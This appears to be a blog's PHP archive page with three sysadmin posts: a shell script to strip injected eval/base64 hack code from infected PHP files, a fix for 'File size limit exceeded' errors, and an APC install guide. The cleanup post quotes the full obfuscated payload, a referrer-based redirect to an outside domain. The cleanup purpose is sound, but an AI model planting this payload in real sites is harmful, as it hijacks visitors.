Archive for the PHP Category

Script to replace the hack code from all php files

While working on a client’s  issue, I  came across a situation  where I have to  replace  the   hack/eval code from many PHP  files and hence thought of writing a small shell script that will  remove the hack/eval code from  all the infected PHP  files .

And I came up with the below simple shell script and thought of sharing it here 🙂 so that if anyone came across the same situation  then  he/she can use that script.

 

 [email protected][#]  vi  hackreplace.sh
hacked='eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGlvcG8uMjV1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));'
find -name \*.php | xargs replace $hacked ""  --

save and quit.

 

You can  execute the   hackreplace.sh file  as

 

 [email protected][#]  sh  hackreplace.sh

  Note :: Just change the hack code in the “hacked”  variable as per your requirement.  

That’s all,  say thanks to  me 😛

File size limit exceeded (core dumped)

Sometimes, it happens that when you try to access your domain  in a web browser you will  get a 500 Internal Server Error and after checking all  the permissions and ownerships for all  files and folders under that domain  you will find  that everything is correct but still  getting that error in  the browser.

 

But when you try  to manually execute the php file from  the server using the php command as

 

[email protected][public_html]# php  index.php
File size limit exceeded (core dumped)

you will get  the above error and now you start thinking what on earth is that .

 

Reason for that ?

 

The reason  for that error is that one of the file probably a log file under that domain exceeds to  2 GB and  by default Apache has setting enabled, to display 500 Internal  Server Error if  in case any file under a domain exceeds 2 GB.

 

How to fix ?

Just either remove that file or echo that file and you are done.

 

Tried the above fix  but still  not working ?

In that case, I  suggest you to check  all  the apache logs files specially error_log, suphp_log, suexec_log and modsec_audit.log and if you found any log file over 2 GB then just remove/echo  that file and restart apache service and you are done. 

 

That’s all

Install APC for PHP on Linux

If you want to install APC for PHP on Linux server then follow the below easy steps :

 [email protected][#] pecl install apc

Or

You can manually install it following the below steps :

[email protected][#] wget http://pecl.php.net/get/APC

The above command will always downloads the latest version of APC

Now extract the downloaded zip file :

[email protected][#] tar -zxf APC-3.1.9.tgz
[email protected][#] cd APC-3.1.9
Now we need to execute ‘phpize’ command

This requires that you have PHP development package installed. On CentOS it is php-devel and which can be installed by running the command :

 yum install php-devel
[email protected][/usr/local/src/APC-3.1.9]# phpize
 Configuring for:
 PHP Api Version: 20090626
 Zend Module Api No: 20090626
 Zend Extension Api No: 220090626
Now we need to configure APC

If you are unsure as to where the php-configs files are located then use the below command to find the correct path

[email protected][#] whereis php-config

php-config: /usr/bin/php-config /usr/local/bin/php-config /usr/man/man1/php-config.1

and then run the configure command like so:
./configure --enable-apc --enable-apc-mmap --with-apxs 
--with-php-config=/usr/bin/php-config

Now as configure is done, we need to run ‘make’ command:

[email protected][#] make
 and then make install:
 [email protected][#] make install

If everything goes well then you will get an output like this

Build process completed successfully
Installing '/usr/local/include/php/ext/apc/apc_serializer.h'
Installing '/usr/local/lib/php/extensions/no-debug-non-zts-20090626/apc.so'
install ok: channel://pecl.php.net/APC-3.1.9
Extension apc enabled in php.ini

Finally just restart the web server to reflect the changes :

[email protected][#] /etc/init.d/httpd restart

But if you encounter an error as below

/usr/local/src/APC-3.1.5/apc.c:461: 
error: syntax error before ')' token
make: *** [apc.lo] Error 1

then just execute the below command :

[email protected][#] yum install pcre-devel

After that again try “make” and “make install” commands and it will work for you now.

That’s all you are done.